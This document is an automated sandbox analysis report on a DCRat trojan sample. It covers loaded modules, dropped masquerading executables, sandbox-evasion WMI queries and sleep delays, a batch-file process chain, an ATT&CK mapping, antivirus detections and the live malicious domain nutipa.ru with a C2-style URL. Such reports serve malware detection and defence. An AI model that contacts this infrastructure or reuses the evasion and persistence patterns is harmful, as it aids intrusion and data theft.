                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ktmw32.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: amsi.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: userenv.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rasapi32.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rasman.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rtutils.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: winmm.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: winmmbase.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: mmdevapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ksuser.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: avrt.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: audioses.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: midimap.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Directory created: C:\Program Files\Google\Chrome\Application\Idle.exe
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Directory created: C:\Program Files\Google\Chrome\Application\6ccacd8608530f
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Directory created: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Directory created: C:\Program Files\Uninstall Information\c73aadd6ea7e5b
                              Source: 150bIjWiGH.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: 150bIjWiGH.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                              Source: 150bIjWiGH.exe Static file information: File size 3700736 > 1048576
                              Source: 150bIjWiGH.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x387000
                              Source: 150bIjWiGH.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Data Obfuscation

                              Source: 150bIjWiGH.exe, DmcWucu9ZjDuseHj6np.cs .Net Code: Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777245)),Type.GetTypeFromHandle(ynpGilbj8SbgalVBhPU.XG22aoS2MnA(16777259))})
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Users\user\Desktop\150bIjWiGH.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Memory allocated: 1B60000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Memory allocated: 1B710000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Memory allocated: 11D0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Memory allocated: 1AC80000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Window / User API: threadDelayed 1848
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Window / User API: threadDelayed 7940
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jafJbNin.log
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7672 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7960 Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412 Thread sleep time: -33204139332677172s >= -30000s
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597181s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -597078s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596968s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596859s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596750s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596640s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596531s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596421s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596277s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596171s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -596062s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595950s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595803s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595687s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595570s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595359s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595150s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -595046s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594934s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594828s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594718s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594609s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594500s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594390s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe TID: 7412Thread sleep time: -594281s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe File opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe File opened: C:\Users\user\AppData\Local\Temp
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe File opened: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe File opened: C:\Users\user\AppData\Local
                              Source: 150bIjWiGH.exe, 00000000.00000002.1747363747.000000001C717000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: w32tm.exe, 00000004.00000002.1771968900.00000261EAFA7000.00000004.00000020.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2944374475.000000001B570000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Memory allocated: page read and write | page guard
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\150bIjWiGH.exe "C:\Users\user\Desktop\150bIjWiGH.exe"
                              Source: 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003165000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Queries volume information: C:\Users\user\Desktop\150bIjWiGH.exe VolumeInformation
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\Desktop\150bIjWiGH.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              Source: Yara match File source: 00000005.00000002.2924790458.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: 150bIjWiGH.exe PID: 7648, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: 150bIjWiGH.exe PID: 7956, type: MEMORYSTR
                              Source: Yara match File source: 150bIjWiGH.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.150bIjWiGH.exe.fc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.1674964023.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: C:\Recovery\winlogon.exe, type: DROPPED
                              Source: Yara match File source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, type: DROPPED
                              Source: Yara match File source: C:\Program Files\Google\Chrome\Application\Idle.exe, type: DROPPED
                              Source: Yara match File source: C:\Recovery\conhost.exe, type: DROPPED

                              Remote Access Functionality

                              Source: Yara match File source: 00000005.00000002.2924790458.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: 150bIjWiGH.exe PID: 7648, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: 150bIjWiGH.exe PID: 7956, type: MEMORYSTR
                              Source: Yara match File source: 150bIjWiGH.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.150bIjWiGH.exe.fc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.1674964023.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: C:\Recovery\winlogon.exe, type: DROPPED
                              Source: Yara match File source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, type: DROPPED
                              Source: Yara match File source: C:\Program Files\Google\Chrome\Application\Idle.exe, type: DROPPED
                              Source: Yara match File source: C:\Recovery\conhost.exe, type: DROPPED

                              MITRE ATT&CK matrix. Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.
                              Techniques listed with a signature count: Windows Management Instrumentation, Scripting, Process Injection, Masquerading, Security Software Discovery, Archive Collected Data, Encrypted Channel, DLL Side-Loading, Disable or Modify Tools, Process Discovery, Non-Application Layer Protocol, Virtualization/Sandbox Evasion, Application Layer Protocol, Application Window Discovery, Deobfuscate/Decode Files or Information, File and Directory Discovery, Obfuscated Files or Information, System Information Discovery, Software Packing.
                              Behavior Graph ID: 1575493, Sample: 150bIjWiGH.exe, Startdate: 15/12/2024, Architecture: WINDOWS, Score: 100
                              Process chain: 150bIjWiGH.exe started cmd.exe, which started 150bIjWiGH.exe, w32tm.exe, conhost.exe and chcp.com. Network contact: nutipa.ru, 104.21.64.130 (CLOUDFLARENETUS, United States).

                              Source | Detection | Scanner | Label
                              150bIjWiGH.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              150bIjWiGH.exe | 100% | Avira | HEUR/AGEN.1323342
                              150bIjWiGH.exe | 100% | Joe Sandbox ML

                              Source | Detection | Scanner | Label
                              C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat | 100% | Avira | BAT/Delbat.C
                              C:\Program Files\Google\Chrome\Application\Idle.exe | 100% | Avira | HEUR/AGEN.1323342
                              C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe | 100% | Avira | HEUR/AGEN.1323342
                              C:\Users\user\Desktop\HwrGmkBt.log | 100% | Avira | HEUR/AGEN.1300079
                              C:\Users\user\Desktop\BDOgJEwE.log | 100% | Avira | TR/AVI.Agent.updqb
                              C:\Users\user\Desktop\ItSOHkQo.log | 100% | Avira | TR/Agent.jbwuj
                              C:\Users\user\Desktop\NjdutxKy.log | 100% | Avira | HEUR/AGEN.1362695
                              C:\Recovery\winlogon.exe | 100% | Avira | HEUR/AGEN.1323342
                              C:\Users\user\Desktop\JtmEmBJF.log | 100% | Avira | HEUR/AGEN.1300079
                              C:\Users\user\Desktop\NsNNYhlE.log | 100% | Avira | TR/AVI.Agent.updqb
                              C:\Recovery\conhost.exe | 100% | Avira | HEUR/AGEN.1323342
                              C:\Users\user\Desktop\CBqofELz.log | 100% | Joe Sandbox ML
                              C:\Program Files\Google\Chrome\Application\Idle.exe | 100% | Joe Sandbox ML
                              C:\Users\user\Desktop\JBWWRkkK.log | 100% | Joe Sandbox ML
                              C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe | 100% | Joe Sandbox ML
                              C:\Users\user\Desktop\HwrGmkBt.log | 100% | Joe Sandbox ML
                              C:\Users\user\Desktop\XXHldJFg.log | 100% | Joe Sandbox ML
                              C:\Users\user\Desktop\NjdutxKy.log | 100% | Joe Sandbox ML
                              C:\Recovery\winlogon.exe | 100% | Joe Sandbox ML
                              C:\Users\user\Desktop\EOEXonVW.log | 100% | Joe Sandbox ML
                              C:\Users\user\Desktop\NpUfPQGh.log | 100% | Joe Sandbox ML
                              C:\Users\user\Desktop\JtmEmBJF.log | 100% | Joe Sandbox ML
                              C:\Recovery\conhost.exe | 100% | Joe Sandbox ML
                              C:\Program Files\Google\Chrome\Application\Idle.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\KcduafKotlNaKVM.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\conhost.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\winlogon.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\BDOgJEwE.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\CBqofELz.log | 21% | ReversingLabs
                              C:\Users\user\Desktop\EOEXonVW.log | 8% | ReversingLabs
                              C:\Users\user\Desktop\FInxAXGv.log | 29% | ReversingLabs
                              C:\Users\user\Desktop\HwrGmkBt.log | 17% | ReversingLabs
                              C:\Users\user\Desktop\INSOfWoM.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\ItSOHkQo.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\JBWWRkkK.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\JtmEmBJF.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\NjdutxKy.log | 17% | ReversingLabs
                              C:\Users\user\Desktop\NpUfPQGh.log | 5% | ReversingLabs
                              C:\Users\user\Desktop\NsNNYhlE.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\OmvnkQVc.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\SLfLdrcT.log | 12% | ReversingLabs
                              C:\Users\user\Desktop\UhRuWMEn.log | 8% | ReversingLabs
                              C:\Users\user\Desktop\WagdIJql.log12%ReversingLabs
                              C:\Users\user\Desktop\XXHldJFg.log21%ReversingLabs
                              C:\Users\user\Desktop\YDIlGXhH.log4%ReversingLabs
                              C:\Users\user\Desktop\ZAjtbXwC.log8%ReversingLabs
                              C:\Users\user\Desktop\aInBkXPZ.log17%ReversingLabs
                              C:\Users\user\Desktop\aauTzsJb.log8%ReversingLabs
                              C:\Users\user\Desktop\ctybNUhB.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\fBwkimbw.log25%ReversingLabs
                              C:\Users\user\Desktop\ftMSEDAr.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\gJztsmvT.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\imbBpzmp.log25%ReversingLabs
                              C:\Users\user\Desktop\jafJbNin.log21%ReversingLabs
                              C:\Users\user\Desktop\krGRUzVH.log4%ReversingLabs
                              C:\Users\user\Desktop\lcSrxwmi.log25%ReversingLabs
                              C:\Users\user\Desktop\mrAShSvf.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\mutAqiZC.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\pekirssD.log21%ReversingLabs
                              C:\Users\user\Desktop\pfYQxwkv.log5%ReversingLabs
                              C:\Users\user\Desktop\qhrIoOvZ.log8%ReversingLabs
                              C:\Users\user\Desktop\rhLyTfpq.log29%ReversingLabs
                              C:\Users\user\Desktop\sSWZvcGR.log17%ReversingLabs
                              C:\Users\user\Desktop\saGrZLhX.log8%ReversingLabs
                              C:\Users\user\Desktop\taahEcao.log25%ReversingLabs
                              C:\Users\user\Desktop\trhzTxUr.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\vUJHQLLN.log8%ReversingLabs
                              C:\Users\user\Desktop\wINPCZGL.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\xiXqauUk.log8%ReversingLabs
                              C:\Users\user\Desktop\yVbyLHQi.log25%ReversingLabs
                              C:\Users\user\Desktop\zTDGhHfd.log25%ReversingLabs
                              No Antivirus matches
                              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nutipa.ru | 100% | Avira URL Cloud | malware |
http://nutipa.ru/ | 100% | Avira URL Cloud | malware |
http://nutipa.ru/_authGamewordpress.php | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nutipa.ru | 104.21.64.130 | true | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://nutipa.ru/_authGamewordpress.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nutipa.ru | 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003165000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 150bIjWiGH.exe, 00000000.00000002.1722563578.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://nutipa.ru/ | 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.64.130 | nutipa.ru | United States |  | 13335 | CLOUDFLARENETUS | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1575493
                                  Start date and time:2024-12-15 19:35:16 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 52s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:11
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:150bIjWiGH.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:E7870CD0C30A52066C454C15A5A5A2F5.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@10/64@1/1
                                  EGA Information:Failed
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target 150bIjWiGH.exe, PID 7648 because it is empty
                                  • Execution Graph export aborted for target 150bIjWiGH.exe, PID 7956 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: 150bIjWiGH.exe
Time | Type | Description
13:36:24 | API Interceptor | 2297010x Sleep call for process: 150bIjWiGH.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.64.130 | wmdqEYgW2i.exe | malicious | DCRat, PureLog Stealer, zgRAT |
104.21.64.130 | https://my.invoice-maker.app/share/invoice/73067339-8011-4BFE-BECF-AEC852361CE2 | malicious | PayPal Phisher |
104.21.64.130 | https://my.invoice-maker.app/share/invoice/73067339-8011-4BFE-BECF-AEC852361CE2 | malicious | PayPal Phisher |
104.21.64.130 | https://casa.tiscali.it/promo/?u=https://rajputnepal.org.np/images/wp/auth/sf_rand_string_lowercase/brogers@homeownersfg.com | malicious | Unknown |
104.21.64.130 | http://vk.com/away.php?to=http://5pp.n0u.mindfly.sa.com./?YYY%3A%2F%2F%23.cGF0cmljaWEuZW5nZWxicmVjaHRAZXVyLm5s | malicious | HTMLPhisher |
